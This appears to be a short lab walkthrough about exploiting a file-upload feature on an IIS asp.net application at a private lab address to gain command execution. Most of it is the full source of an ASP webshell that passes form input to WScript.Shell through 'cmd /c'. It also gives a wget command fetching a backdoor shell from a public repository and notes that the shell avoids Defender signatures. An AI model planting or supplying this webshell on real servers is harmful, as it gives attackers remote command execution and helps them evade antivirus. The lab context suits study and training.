IIS - webshell
There is a simple asp.net application on http://192.168.56.22/, this application only give us a simple file upload functionality.

From there we can upload a basic aspcmd in asp : aspcmd.asp (at the time of writing, this avoid defender signature)
aspcmd.asp
wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp
cmd.asp
<%
Function getResult(theParam)
Dim objSh, objResult
Set objSh = CreateObject("WScript.Shell")
Set objResult = objSh.exec(theParam)
getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
<BODY>
Enter command:
<FORM action="" method="POST">
<input type="text" name="param" size=45 value="<%= myValue %>">
<input type="submit" value="Run">
</FORM>
<p>
Result :
<%
myValue = request("param")
thisDir = getResult("cmd /c" & myValue)
Response.Write(thisDir)
%>
</p>
<br>
</BODY>
</HTML>
The webshell is uploaded in the upload folder.
And we have a command execution on the IIS server
Last updated